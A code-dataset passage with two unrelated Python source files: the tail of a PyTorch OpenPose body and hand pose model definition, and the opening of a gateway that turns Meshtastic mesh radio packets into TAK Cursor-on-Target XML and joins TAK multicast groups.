blocks['Mconv6_7_stage0_L2'] = OrderedDict([
('Mconv6_stage0_L2',[288, 256, 1,1,0]),
('Mconv7_stage0_L2',[256,52,1,1,0])
])
#stage1~3
for s in range(1,4):
blocks['Mconv1_stage%d_L2' % s] = OrderedDict([
('Mconv1_stage%d_L2_0' % s,[180,128,3,1,1]),
('Mconv1_stage%d_L2_1' % s,[128,128,3,1,1]),
('Mconv1_stage%d_L2_2' % s,[128,128,3,1,1])
])
for i in range(2,6):
blocks['Mconv%d_stage%d_L2' % (i,s)] = OrderedDict([
('Mconv%d_stage%d_L2_0' % (i,s) ,[384,128,3,1,1]),
('Mconv%d_stage%d_L2_1' % (i,s) ,[128,128,3,1,1]),
('Mconv%d_stage%d_L2_2' % (i,s) ,[128,128,3,1,1])
])
blocks['Mconv6_7_stage%d_L2' % s] = OrderedDict([
('Mconv6_stage%d_L2' % s,[384,512,1,1,0]),
('Mconv7_stage%d_L2' % s,[512,52,1,1,0])
])
#L1
#stage0
blocks['Mconv1_stage0_L1'] = OrderedDict([
('Mconv1_stage0_L1_0',[180,96,3,1,1]),
('Mconv1_stage0_L1_1',[96,96,3,1,1]),
('Mconv1_stage0_L1_2',[96,96,3,1,1])
])
for i in range(2,6):
blocks['Mconv%d_stage0_L1' % i] = OrderedDict([
('Mconv%d_stage0_L1_0' % i,[288,96,3,1,1]),
('Mconv%d_stage0_L1_1' % i,[96,96,3,1,1]),
('Mconv%d_stage0_L1_2' % i,[96,96,3,1,1])
])
blocks['Mconv6_7_stage0_L1'] = OrderedDict([
('Mconv6_stage0_L1',[288, 256, 1,1,0]),
('Mconv7_stage0_L1',[256,26,1,1,0])
])
#stage1
blocks['Mconv1_stage1_L1'] = OrderedDict([
('Mconv1_stage1_L1_0',[206,128,3,1,1]),
('Mconv1_stage1_L1_1',[128,128,3,1,1]),
('Mconv1_stage1_L1_2',[128,128,3,1,1])
])
for i in range(2,6):
blocks['Mconv%d_stage1_L1' % i] = OrderedDict([
('Mconv%d_stage1_L1_0' % i,[384,128,3,1,1]),
('Mconv%d_stage1_L1_1' % i,[128,128,3,1,1]),
('Mconv%d_stage1_L1_2' % i,[128,128,3,1,1])
])
blocks['Mconv6_7_stage1_L1'] = OrderedDict([
('Mconv6_stage1_L1',[384,512,1,1,0]),
('Mconv7_stage1_L1',[512,26,1,1,0])
])
for k in blocks.keys():
blocks[k] = make_layers_Mconv(blocks[k], no_relu_layers)
self.models = nn.ModuleDict(blocks)
#self.model_L2_S0_mconv1 = blocks['Mconv1_stage0_L2']
def _Mconv_forward(self,x,models):
outs = []
out = x
for m in models:
out = m(out)
outs.append(out)
return torch.cat(outs,1)
def forward(self,x):
out0 = self.model0(x)
#L2
tout = out0
for s in range(4):
tout = self._Mconv_forward(tout,self.models['Mconv1_stage%d_L2' % s])
for v in range(2,6):
tout = self._Mconv_forward(tout,self.models['Mconv%d_stage%d_L2' % (v,s)])
tout = self.models['Mconv6_7_stage%d_L2' % s][0](tout)
tout = self.models['Mconv6_7_stage%d_L2' % s][1](tout)
outL2 = tout
tout = torch.cat([out0,tout],1)
#L1 stage0
#tout = torch.cat([out0,outL2],1)
tout = self._Mconv_forward(tout, self.models['Mconv1_stage0_L1'])
for v in range(2,6):
tout = self._Mconv_forward(tout, self.models['Mconv%d_stage0_L1' % v])
tout = self.models['Mconv6_7_stage0_L1'][0](tout)
tout = self.models['Mconv6_7_stage0_L1'][1](tout)
outS0L1 = tout
tout = torch.cat([out0,outS0L1,outL2],1)
#L1 stage1
tout = self._Mconv_forward(tout, self.models['Mconv1_stage1_L1'])
for v in range(2,6):
tout = self._Mconv_forward(tout, self.models['Mconv%d_stage1_L1' % v])
tout = self.models['Mconv6_7_stage1_L1'][0](tout)
outS1L1 = self.models['Mconv6_7_stage1_L1'][1](tout)
return outS1L1,outL2
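# Output sketch: for an input of shape (N, 3, H, W) with H and W divisible by 8,
#   outS1L1 -> (N, 26, H/8, W/8) keypoint/background heatmaps (Mconv7_stage1_L1 ends in 26 channels)
#   outL2   -> (N, 52, H/8, W/8) part-affinity fields (Mconv7_stage3_L2 ends in 52 channels)
# The factor of 8 comes from the three stride-2 max-pool layers in block0.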
class bodypose_model(nn.Module):
def __init__(self):
super(bodypose_model, self).__init__()
# these layers have no relu layer
no_relu_layers = ['conv5_5_CPM_L1', 'conv5_5_CPM_L2', 'Mconv7_stage2_L1',\
'Mconv7_stage2_L2', 'Mconv7_stage3_L1', 'Mconv7_stage3_L2',\
'Mconv7_stage4_L1', 'Mconv7_stage4_L2', 'Mconv7_stage5_L1',\
'Mconv7_stage5_L2', 'Mconv7_stage6_L1', 'Mconv7_stage6_L2']
blocks = {}
block0 = OrderedDict([
('conv1_1', [3, 64, 3, 1, 1]),
('conv1_2', [64, 64, 3, 1, 1]),
('pool1_stage1', [2, 2, 0]),
('conv2_1', [64, 128, 3, 1, 1]),
('conv2_2', [128, 128, 3, 1, 1]),
('pool2_stage1', [2, 2, 0]),
('conv3_1', [128, 256, 3, 1, 1]),
('conv3_2', [256, 256, 3, 1, 1]),
('conv3_3', [256, 256, 3, 1, 1]),
('conv3_4', [256, 256, 3, 1, 1]),
('pool3_stage1', [2, 2, 0]),
('conv4_1', [256, 512, 3, 1, 1]),
('conv4_2', [512, 512, 3, 1, 1]),
('conv4_3_CPM', [512, 256, 3, 1, 1]),
('conv4_4_CPM', [256, 128, 3, 1, 1])
])
# Stage 1
block1_1 = OrderedDict([
('conv5_1_CPM_L1', [128, 128, 3, 1, 1]),
('conv5_2_CPM_L1', [128, 128, 3, 1, 1]),
('conv5_3_CPM_L1', [128, 128, 3, 1, 1]),
('conv5_4_CPM_L1', [128, 512, 1, 1, 0]),
('conv5_5_CPM_L1', [512, 38, 1, 1, 0])
])
block1_2 = OrderedDict([
('conv5_1_CPM_L2', [128, 128, 3, 1, 1]),
('conv5_2_CPM_L2', [128, 128, 3, 1, 1]),
('conv5_3_CPM_L2', [128, 128, 3, 1, 1]),
('conv5_4_CPM_L2', [128, 512, 1, 1, 0]),
('conv5_5_CPM_L2', [512, 19, 1, 1, 0])
])
blocks['block1_1'] = block1_1
blocks['block1_2'] = block1_2
self.model0 = make_layers(block0, no_relu_layers)
# Stages 2 - 6
for i in range(2, 7):
blocks['block%d_1' % i] = OrderedDict([
('Mconv1_stage%d_L1' % i, [185, 128, 7, 1, 3]),
('Mconv2_stage%d_L1' % i, [128, 128, 7, 1, 3]),
('Mconv3_stage%d_L1' % i, [128, 128, 7, 1, 3]),
('Mconv4_stage%d_L1' % i, [128, 128, 7, 1, 3]),
('Mconv5_stage%d_L1' % i, [128, 128, 7, 1, 3]),
('Mconv6_stage%d_L1' % i, [128, 128, 1, 1, 0]),
('Mconv7_stage%d_L1' % i, [128, 38, 1, 1, 0])
])
blocks['block%d_2' % i] = OrderedDict([
('Mconv1_stage%d_L2' % i, [185, 128, 7, 1, 3]),
('Mconv2_stage%d_L2' % i, [128, 128, 7, 1, 3]),
('Mconv3_stage%d_L2' % i, [128, 128, 7, 1, 3]),
('Mconv4_stage%d_L2' % i, [128, 128, 7, 1, 3]),
('Mconv5_stage%d_L2' % i, [128, 128, 7, 1, 3]),
('Mconv6_stage%d_L2' % i, [128, 128, 1, 1, 0]),
('Mconv7_stage%d_L2' % i, [128, 19, 1, 1, 0])
])
for k in blocks.keys():
blocks[k] = make_layers(blocks[k], no_relu_layers)
self.model1_1 = blocks['block1_1']
self.model2_1 = blocks['block2_1']
self.model3_1 = blocks['block3_1']
self.model4_1 = blocks['block4_1']
self.model5_1 = blocks['block5_1']
self.model6_1 = blocks['block6_1']
self.model1_2 = blocks['block1_2']
self.model2_2 = blocks['block2_2']
self.model3_2 = blocks['block3_2']
self.model4_2 = blocks['block4_2']
self.model5_2 = blocks['block5_2']
self.model6_2 = blocks['block6_2']
def forward(self, x):
out1 = self.model0(x)
out1_1 = self.model1_1(out1)
out1_2 = self.model1_2(out1)
out2 = torch.cat([out1_1, out1_2, out1], 1)
out2_1 = self.model2_1(out2)
out2_2 = self.model2_2(out2)
out3 = torch.cat([out2_1, out2_2, out1], 1)
out3_1 = self.model3_1(out3)
out3_2 = self.model3_2(out3)
out4 = torch.cat([out3_1, out3_2, out1], 1)
out4_1 = self.model4_1(out4)
out4_2 = self.model4_2(out4)
out5 = torch.cat([out4_1, out4_2, out1], 1)
out5_1 = self.model5_1(out5)
out5_2 = self.model5_2(out5)
out6 = torch.cat([out5_1, out5_2, out1], 1)
out6_1 = self.model6_1(out6)
out6_2 = self.model6_2(out6)
return out6_2,out6_1
class handpose_model(nn.Module):
def __init__(self):
super(handpose_model, self).__init__()
# these layers have no relu layer
no_relu_layers = ['conv6_2_CPM', 'Mconv7_stage2', 'Mconv7_stage3',\
'Mconv7_stage4', 'Mconv7_stage5', 'Mconv7_stage6']
# stage 1
block1_0 = OrderedDict([
('conv1_1', [3, 64, 3, 1, 1]),
('conv1_2', [64, 64, 3, 1, 1]),
('pool1_stage1', [2, 2, 0]),
('conv2_1', [64, 128, 3, 1, 1]),
('conv2_2', [128, 128, 3, 1, 1]),
('pool2_stage1', [2, 2, 0]),
('conv3_1', [128, 256, 3, 1, 1]),
('conv3_2', [256, 256, 3, 1, 1]),
('conv3_3', [256, 256, 3, 1, 1]),
('conv3_4', [256, 256, 3, 1, 1]),
('pool3_stage1', [2, 2, 0]),
('conv4_1', [256, 512, 3, 1, 1]),
('conv4_2', [512, 512, 3, 1, 1]),
('conv4_3', [512, 512, 3, 1, 1]),
('conv4_4', [512, 512, 3, 1, 1]),
('conv5_1', [512, 512, 3, 1, 1]),
('conv5_2', [512, 512, 3, 1, 1]),
('conv5_3_CPM', [512, 128, 3, 1, 1])
])
block1_1 = OrderedDict([
('conv6_1_CPM', [128, 512, 1, 1, 0]),
('conv6_2_CPM', [512, 22, 1, 1, 0])
])
blocks = {}
blocks['block1_0'] = block1_0
blocks['block1_1'] = block1_1
# stage 2-6
for i in range(2, 7):
blocks['block%d' % i] = OrderedDict([
('Mconv1_stage%d' % i, [150, 128, 7, 1, 3]),
('Mconv2_stage%d' % i, [128, 128, 7, 1, 3]),
('Mconv3_stage%d' % i, [128, 128, 7, 1, 3]),
('Mconv4_stage%d' % i, [128, 128, 7, 1, 3]),
('Mconv5_stage%d' % i, [128, 128, 7, 1, 3]),
('Mconv6_stage%d' % i, [128, 128, 1, 1, 0]),
('Mconv7_stage%d' % i, [128, 22, 1, 1, 0])
])
for k in blocks.keys():
blocks[k] = make_layers(blocks[k], no_relu_layers)
self.model1_0 = blocks['block1_0']
self.model1_1 = blocks['block1_1']
self.model2 = blocks['block2']
self.model3 = blocks['block3']
self.model4 = blocks['block4']
self.model5 = blocks['block5']
self.model6 = blocks['block6']
def forward(self, x):
out1_0 = self.model1_0(x)
out1_1 = self.model1_1(out1_0)
concat_stage2 = torch.cat([out1_1, out1_0], 1)
out_stage2 = self.model2(concat_stage2)
concat_stage3 = torch.cat([out_stage2, out1_0], 1)
out_stage3 = self.model3(concat_stage3)
concat_stage4 = torch.cat([out_stage3, out1_0], 1)
out_stage4 = self.model4(concat_stage4)
concat_stage5 = torch.cat([out_stage4, out1_0], 1)
out_stage5 = self.model5(concat_stage5)
concat_stage6 = torch.cat([out_stage5, out1_0], 1)
out_stage6 = self.model6(concat_stage6)
return out_stage6
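# Output sketch: out_stage6 has shape (N, 22, H/8, W/8) -- the final Mconv7_stage6 layer has
# 22 channels (commonly read as 21 hand keypoints plus background), and block1_0 contains
# three stride-2 max-pool layers.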
| 15,939 | Python | .py | 338 | 32.41716 | 90 | 0.446962 | alessandrozonta/ComfyUI-OpenPose | 8 | 1 | 2 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,116 | tak_meshtastic_gateway.py | brian7704_TAK_Meshtastic_Gateway/tak_meshtastic_gateway/tak_meshtastic_gateway.py | import argparse
import sys
import traceback
from tak_meshtastic_gateway.dm_socket_thread import DMSocketThread
from bs4 import BeautifulSoup
from xml.etree.ElementTree import Element, SubElement, tostring
from meshtastic import portnums_pb2, mesh_pb2, atak_pb2, protocols
import meshtastic.serial_interface
import meshtastic.tcp_interface
from pubsub import pub
import datetime
import socket
import takproto
import time
import select
import colorlog
import logging
import unishox2
import uuid
import base64
import netifaces
import ipaddress
import platform
# Outputs
chat_out = ("224.10.10.1", 17012)
sa_multicast_out = ("239.2.3.1", 6969)
# Inputs
chat_in = ("224.10.10.1", 17012) # UDP
default_in = ("0.0.0.0", 4242) # UDP
default_in_tcp = ("0.0.0.0", 4242) # TCP
prc_152 = ("0.0.0.0", 10001) # UDP
request_notify = ("0.0.0.0", 8087) # TCP
route_management = ("0.0.0.0", 8087) # UDP
sa_multicast_in = ("239.2.3.1", 6969) # UDP
sa_multicast_sensor_data_in = ("239.5.5.55", 7171) # UDP
class TAKMeshtasticGateway:
def __init__(self, ip=None, serial_device=None, mesh_ip=None, tak_client_ip="localhost", tx_interval=30,
dm_port=4243, log_file=None, debug=False):
self.meshtastic_devices = {}
self.node_names = {}
self.tak_client = {}
self.chat_sock = None
self.sa_multicast_sock = None
self.ip = ip
self.dm_port = dm_port
self.serial_device = serial_device
self.mesh_ip = mesh_ip
self.tak_client_ip = tak_client_ip
self.tx_interval = tx_interval
self.log_file = log_file
self.log_level = logging.DEBUG if debug else logging.INFO
self.interface = None
self.meshtastic_connected = False
self.meshtastic_device_info = None
self.socket_client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket_client.connect((tak_client_ip, 4242))
color_log_handler = colorlog.StreamHandler()
color_log_formatter = colorlog.ColoredFormatter(
'%(log_color)s[%(asctime)s] - TAK Meshtastic Gateway[%(process)d] - %(module)s - %(funcName)s - %(lineno)d - %(levelname)s - %(message)s',
datefmt="%Y-%m-%d %H:%M:%S")
color_log_handler.setFormatter(color_log_formatter)
self.logger = colorlog.getLogger('TAK Meshtastic Gateway')
self.logger.setLevel(self.log_level)
self.logger.addHandler(color_log_handler)
self.logger.propagate = False
if self.log_file:
try:
fh = logging.FileHandler(self.log_file)
fh.setLevel(self.log_level)
fh.setFormatter(logging.Formatter(
"[%(asctime)s] - TAK Meshtastic Gateway[%(process)d] - %(module)s - %(funcName)s - %(lineno)d - %(levelname)s - %(message)s"))
self.logger.addHandler(fh)
except BaseException as e:
self.logger.error(f"Failed to add log file handler: {e}")
sys.exit()
pub.subscribe(self.on_receive, "meshtastic.receive")
pub.subscribe(self.on_connection, "meshtastic.connection.established")
pub.subscribe(self.on_connection_lost, "meshtastic.connection.lost")
self.connect_to_meshtastic_node()
self.dm_sock = DMSocketThread(self.logger, self.interface)
def connect_to_meshtastic_node(self):
if self.mesh_ip:
self.interface = meshtastic.tcp_interface.TCPInterface(self.mesh_ip)
else:
self.interface = meshtastic.serial_interface.SerialInterface(self.serial_device)
def cot(self, pb, from_id, to_id, portnum, how='m-g', cot_type='a-f-G-U-C', uid=None):
if not uid and from_id in self.meshtastic_devices and self.meshtastic_devices[from_id]['uid']:
uid = self.meshtastic_devices[from_id]['uid']
elif not uid:
uid = from_id
now = datetime.datetime.now().strftime("%Y-%m-%dT%H:%M:%SZ")
stale = (datetime.datetime.now() + datetime.timedelta(days=1)).strftime("%Y-%m-%dT%H:%M:%SZ")
event = Element('event', {'how': how, 'type': cot_type, 'version': '2.0',
'uid': uid, 'start': now, 'time': now, 'stale': stale})
SubElement(event, 'point', {'ce': '9999999.0', 'le': '9999999.0',
'hae': str(self.meshtastic_devices[from_id]['last_alt']),
'lat': str(self.meshtastic_devices[from_id]['last_lat']),
'lon': str(self.meshtastic_devices[from_id]['last_lon'])})
detail = SubElement(event, 'detail')
if portnum == "TEXT_MESSAGE_APP" or (portnum == "ATAK_PLUGIN" and pb.HasField('chat')):
return event, detail
else:
SubElement(detail, 'takv', {'device': self.meshtastic_devices[from_id]['hw_model'],
'version': self.meshtastic_devices[from_id]['firmware_version'],
'platform': 'Meshtastic', 'os': 'Meshtastic',
'macaddr': self.meshtastic_devices[from_id]['macaddr'],
'meshtastic_id': self.meshtastic_devices[from_id]['meshtastic_id']})
SubElement(detail, 'contact',{'callsign': self.meshtastic_devices[from_id]['long_name'], 'endpoint': f'{self.ip}:{self.dm_port}:tcp'})
SubElement(detail, 'uid', {'Droid': self.meshtastic_devices[from_id]['long_name']})
SubElement(detail, 'precisionlocation', {'altsrc': 'GPS', 'geopointsrc': 'GPS'})
SubElement(detail, 'status', {'battery': str(self.meshtastic_devices[from_id]['battery'])})
SubElement(detail, 'track', {'course': '0.0', 'speed': '0.0'})
SubElement(detail, '__group', {'name': self.meshtastic_devices[from_id]['team'],
'role': self.meshtastic_devices[from_id]['role']})
return event
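# Illustrative sketch of the CoT event assembled above for a position/node-info packet
# (attribute values are placeholders, not real output):
#   <event how="m-g" type="a-f-G-U-C" version="2.0" uid="!abcd1234" time="..." start="..." stale="...">
#     <point ce="9999999.0" le="9999999.0" hae="..." lat="..." lon="..."/>
#     <detail>
#       <takv .../><contact .../><uid .../><precisionlocation .../>
#       <status battery="..."/><track .../><__group name="..." role="..."/>
#     </detail>
#   </event>
# For chat packets the method instead returns (event, detail) so the caller can append the
# __chat and remarks elements itself.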
def position(self, pb, from_id, to_id, portnum):
try:
self.meshtastic_devices[from_id]['last_lat'] = pb.latitude_i * .0000001
self.meshtastic_devices[from_id]['last_lon'] = pb.longitude_i * .0000001
self.meshtastic_devices[from_id]['last_alt'] = pb.altitude
if portnum == portnums_pb2.PortNum.POSITION_APP:
self.meshtastic_devices[from_id]['course'] = pb.ground_track if pb.ground_track else "0.0"
self.meshtastic_devices[from_id]['speed'] = pb.ground_speed if pb.ground_speed else "0.0"
return self.cot(pb, from_id, to_id, portnum)
except BaseException as e:
self.logger.error("Failed to create CoT: {}".format(str(e)))
self.logger.error(traceback.format_exc())
return
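# Meshtastic encodes coordinates as integers in units of 1e-7 degrees, so the * .0000001
# above converts them back, e.g. latitude_i = 407127530 -> 40.712753 degrees.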
def text_message(self, pb, from_id, to_id, portnum):
callsign = from_id
if from_id in self.meshtastic_devices:
callsign = self.meshtastic_devices[from_id]['long_name']
self.logger.debug(self.meshtastic_devices)
to_id = f"!{to_id:08x}"
chatroom = "All Chat Rooms"
self.logger.debug(f"to_id: {to_id} mesh id: {self.meshtastic_device_info['user']['id']}")
if str(to_id) == str(self.meshtastic_device_info['user']['id']) and self.tak_client:
chatroom = self.tak_client['uid']
self.logger.debug(f"Chatroom is {chatroom}")
if from_id in self.meshtastic_devices and self.meshtastic_devices[from_id]['uid']:
from_uid = self.meshtastic_devices[from_id]['uid']
else:
from_uid = from_id
message_uid = str(uuid.uuid4())
event, detail = self.cot(pb, from_uid, chatroom, portnum, how='h-g-i-g-o', cot_type='b-t-f',
uid="GeoChat.{}.{}.{}".format(from_uid, chatroom, message_uid))
chat = SubElement(detail, '__chat',
{'chatroom': chatroom, 'groupOwner': "false", 'id': chatroom,
'messageId': message_uid, 'parent': 'RootContactGroup',
'senderCallsign': callsign})
SubElement(chat, 'chatgrp', {'id': chatroom, 'uid0': from_uid, 'uid1': chatroom})
SubElement(detail, 'link', {'relation': 'p-p', 'type': 'a-f-G-U-C', 'uid': from_uid})
remarks = SubElement(detail, 'remarks', {'source': 'BAO.F.ATAK.{}'.format(from_uid),
'time': datetime.datetime.now().strftime("%Y-%m-%dT%H:%M:%SZ"),
'to': chatroom})
remarks.text = pb.decode('utf-8', 'replace')
return event
def node_info(self, pb, from_id, to_id, portnum):
if portnum == "ATAK_PLUGIN":
if pb.is_compressed:
uid = unishox2.decompress(pb.contact.device_callsign, len(pb.contact.device_callsign))
else:
uid = pb.contact.device_callsign
self.meshtastic_devices[from_id]['uid'] = uid
if pb.is_compressed:
self.meshtastic_devices[from_id]['long_name'] = unishox2.decompress(pb.contact.callsign,
len(pb.contact.callsign))
else:
self.meshtastic_devices[from_id]['long_name'] = pb.contact.callsign
self.meshtastic_devices[from_id]['short_name'] = uid[-4:]
self.meshtastic_devices[from_id]['battery'] = pb.status.battery
if pb.group.team != 0:
self.meshtastic_devices[from_id]['team'] = atak_pb2.Team.Name(pb.group.team)
if pb.group.role != 0:
self.meshtastic_devices[from_id]['role'] = atak_pb2.MemberRole.Name(pb.group.role)
return self.cot(pb, uid, to_id, portnum)
else:
hw_model = mesh_pb2.HardwareModel.Name(pb.hw_model)
if hw_model and not self.meshtastic_devices[from_id]['hw_model']:
self.meshtastic_devices[from_id]['hw_model'] = hw_model
if pb.long_name and not self.meshtastic_devices[from_id]['long_name']:
self.meshtastic_devices[from_id]['long_name'] = str(pb.long_name)
if pb.short_name and not self.meshtastic_devices[from_id]['short_name']:
self.meshtastic_devices[from_id]['short_name'] = str(pb.short_name)
if pb.macaddr and not self.meshtastic_devices[from_id]['macaddr']:
self.meshtastic_devices[from_id]['macaddr'] = base64.b64encode(pb.macaddr).decode('ascii')
return self.cot(pb, from_id, to_id, portnum)
def telemetry(self, pb, from_id, to_id, portnum):
if pb.HasField('device_metrics'):
self.meshtastic_devices[from_id]['battery'] = pb.device_metrics.battery_level
self.meshtastic_devices[from_id]['voltage'] = pb.device_metrics.voltage
self.meshtastic_devices[from_id]['uptime'] = pb.device_metrics.uptime_seconds
elif pb.HasField('environment_metrics'):
self.meshtastic_devices[from_id]['temperature'] = pb.environment_metrics.temperature
self.meshtastic_devices[from_id]['relative_humidity'] = pb.environment_metrics.relative_humidity
self.meshtastic_devices[from_id]['barometric_pressure'] = pb.environment_metrics.barometric_pressure
self.meshtastic_devices[from_id]['gas_resistance'] = pb.environment_metrics.gas_resistance
self.meshtastic_devices[from_id]['voltage'] = pb.environment_metrics.voltage
self.meshtastic_devices[from_id]['current'] = pb.environment_metrics.current
self.meshtastic_devices[from_id]['iaq'] = pb.environment_metrics.iaq
def atak_plugin(self, pb, from_id, to_id, portnum):
if pb.HasField('contact') and pb.is_compressed:
uid = unishox2.decompress(pb.contact.device_callsign, len(pb.contact.device_callsign))
callsign = unishox2.decompress(pb.contact.callsign, len(pb.contact.callsign))
elif pb.HasField('contact') and not pb.is_compressed:
uid = pb.contact.device_callsign
callsign = pb.contact.callsign
else:
self.logger.warning("Got an ATAK_PLUGIN packet without the contact field")
self.logger.warning(pb)
return
if uid not in self.meshtastic_devices:
self.meshtastic_devices[uid] = {'hw_model': '', 'long_name': callsign, 'short_name': uid[-4:],
'macaddr': '',
'firmware_version': '', 'last_lat': "0.0", 'last_lon': "0.0",
'meshtastic_id': '',
'battery': 0, 'voltage': 0, 'uptime': 0, 'last_alt': "9999999.0",
'course': '0.0',
'speed': '0.0', 'team': 'Cyan', 'role': 'Team Member', 'uid': uid}
self.node_info(pb, uid, to_id, portnum)
if pb.HasField('status'):
self.meshtastic_devices[uid]['battery'] = pb.status.battery
if pb.HasField('pli'):
self.meshtastic_devices[uid]['last_lat'] = pb.pli.latitude_i * .0000001
self.meshtastic_devices[uid]['last_lon'] = pb.pli.longitude_i * .0000001
self.meshtastic_devices[uid]['last_alt'] = pb.pli.altitude
self.meshtastic_devices[uid]['course'] = pb.pli.course
self.meshtastic_devices[uid]['speed'] = pb.pli.speed
return self.cot(pb, uid, to_id, portnum)
elif pb.HasField('chat'):
if pb.is_compressed:
to = unishox2.decompress(pb.chat.to, len(pb.chat.to))
message = unishox2.decompress(pb.chat.message, len(pb.chat.message))
else:
to = pb.chat.to
message = pb.chat.message
self.logger.debug(
"Got chat: {} {}->{}: {}".format(to, from_id, to_id, message))
message_uid = str(uuid.uuid4())
message_uid = "GeoChat.{}.{}.{}".format(uid, to, message_uid)
event, detail = self.cot(pb, uid, to_id, portnum, how='h-g-i-g-o', cot_type='b-t-f', uid=message_uid)
chat = SubElement(detail, '__chat',
{'chatroom': 'All Chat Rooms', 'groupOwner': "false", 'id': to,
'messageId': message_uid, 'parent': 'RootContactGroup',
'senderCallsign': callsign})
SubElement(chat, 'chatgrp', {'id': to, 'uid0': uid, 'uid1': to})
SubElement(detail, 'link', {'relation': 'p-p', 'type': 'a-f-G-U-C', 'uid': uid})
remarks = SubElement(detail, 'remarks', {'source': 'BAO.F.ATAK.{}'.format(uid),
'time': datetime.datetime.now().strftime("%Y-%m-%dT%H:%M:%SZ"),
'to': to})
remarks.text = message
return event
def protobuf_to_cot(self, pb, from_id, to_id, portnum):
event = None
if from_id[0] != "!":
from_id = "!" + from_id
if from_id != self.meshtastic_device_info['user']['id'] and from_id not in self.meshtastic_devices:
self.meshtastic_devices[from_id] = {'hw_model': '', 'long_name': '', 'short_name': '', 'macaddr': '',
'firmware_version': '', 'last_lat': "0.0", 'last_lon': "0.0",
'meshtastic_id': from_id,
'battery': 0, 'voltage': 0, 'uptime': 0, 'last_alt': "9999999.0",
'course': '0.0',
'speed': '0.0', 'team': 'Cyan', 'role': 'Team Member', 'uid': None}
self.dm_sock.add_meshtastic_node(from_id)
if portnum == "MAP_REPORT_APP" or (portnum == "POSITION_APP" and pb.latitude_i):
event = self.position(pb, from_id, to_id, portnum)
elif portnum == "NODEINFO_APP":
event = self.node_info(pb, from_id, to_id, portnum)
elif portnum == "TEXT_MESSAGE_APP":
event = self.text_message(pb, from_id, to_id, portnum)
elif portnum == "ATAK_PLUGIN":
event = self.atak_plugin(pb, from_id, to_id, portnum)
elif portnum == "TELEMETRY_APP":
self.telemetry(pb, from_id, to_id, portnum)
try:
if event is not None:
self.logger.debug(f"Sending {tostring(event)}")
self.socket_client.send(tostring(event))
except BaseException as e:
self.logger.error(str(e))
self.logger.error(traceback.format_exc())
def on_receive(self, packet, interface): # called when a packet arrives
from_id = packet['from']
from_id = f"!{from_id:08x}"
# Ignore messages sent from this Meshtastic device
if from_id == self.meshtastic_device_info['user']['id']:
return
to_id = packet['to']
self.logger.debug(packet)
if 'decoded' not in packet:
return
self.logger.info(f"Got a message from {from_id}")
pn = packet['decoded']['portnum']
handler = protocols.get(portnums_pb2.PortNum.Value(packet['decoded']['portnum']))
if handler is None:
if packet['decoded']['portnum'] == "ATAK_PLUGIN":
try:
tak_packet = atak_pb2.TAKPacket()
tak_packet.ParseFromString(packet['decoded']['payload'])
self.logger.debug(tak_packet)
self.protobuf_to_cot(tak_packet, from_id, to_id, pn)
except BaseException as e:
self.logger.debug(f"Failed to decode ATAK_PLUGIN protobuf: {e}")
return
if handler.protobufFactory is None:
self.protobuf_to_cot(packet['decoded']['payload'], from_id, to_id, pn)
else:
try:
pb = handler.protobufFactory()
pb.ParseFromString(packet['decoded']['payload'])
if pn == portnums_pb2.PortNum.NODEINFO_APP:
self.node_names[from_id] = pb.long_name
self.logger.debug(pb)
self.protobuf_to_cot(pb, from_id, to_id, pn)
except:
self.logger.error(traceback.format_exc())
def on_connection(self, interface, topic=pub.AUTO_TOPIC):
self.logger.info("Connected to the Meshtastic Device")
self.meshtastic_connected = True
self.meshtastic_device_info = interface.getMyNodeInfo()
self.logger.debug(self.meshtastic_device_info)
nodes = interface.nodes
self.logger.debug(nodes)
for node in nodes:
if interface.nodes[node] != self.meshtastic_device_info:
self.meshtastic_devices[node] = {'hw_model': nodes[node]['user']['hwModel'], 'long_name': nodes[node]['user']['longName'],
'short_name': nodes[node]['user']['shortName'], 'macaddr': '',
'firmware_version': '', 'last_lat': "0.0", 'last_lon': "0.0",
'meshtastic_id': node, 'battery': 0, 'voltage': 0, 'uptime': 0,
'last_alt': "9999999.0", 'course': '0.0', 'speed': '0.0', 'team': 'Cyan',
'role': 'Team Member', 'uid': node}
self.dm_sock.add_meshtastic_node(node)
self.logger.debug(self.meshtastic_devices)
def on_connection_lost(self, interface):
self.logger.error("Lost connection to the Meshtastic device, attempting to reconnect...")
self.meshtastic_connected = False
self.connect_to_meshtastic_node()
def main(self):
for interface in netifaces.interfaces():
if self.ip:
break
addresses = netifaces.ifaddresses(interface)
for address in addresses:
try:
ip = ipaddress.IPv4Address(addresses[address][0]['addr'])
if ip.is_private and not ip.is_loopback and not ip.is_multicast:
self.ip = str(ip)
self.logger.info(f"Your IP address is {self.ip}")
break
except ValueError:
self.logger.debug(f"{addresses[address][0]['addr']} is not an IPv4 address")
self.logger.debug(f"The system platform is {platform.system()}")
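        # TAK clients publish GeoChat and SA/PLI CoTs on two separate multicast groups (the
        # chat_in / sa_multicast_in constants); join both. Windows needs the socket bound to the
        # local interface address, while Linux/macOS bind to the multicast group itself.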
self.chat_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
if platform.system() == 'Windows':
self.chat_sock.bind((self.ip, chat_in[1]))
self.chat_sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_IF, socket.inet_aton(self.ip))
self.chat_sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(chat_in[0]) + socket.inet_aton(self.ip))
else:
self.chat_sock.bind(chat_in)
self.chat_sock.setsockopt(socket.SOL_IP, socket.IP_MULTICAST_IF, socket.inet_aton(self.ip))
self.chat_sock.setsockopt(socket.SOL_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(chat_in[0]) + socket.inet_aton(self.ip))
self.sa_multicast_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
self.sa_multicast_sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 32)
if platform.system() == 'Windows':
self.sa_multicast_sock.bind((self.ip, sa_multicast_in[1]))
self.sa_multicast_sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_IF, socket.inet_aton(self.ip))
self.sa_multicast_sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, socket.inet_aton(sa_multicast_in[0]) + socket.inet_aton(self.ip))
else:
self.sa_multicast_sock.bind(sa_multicast_in)
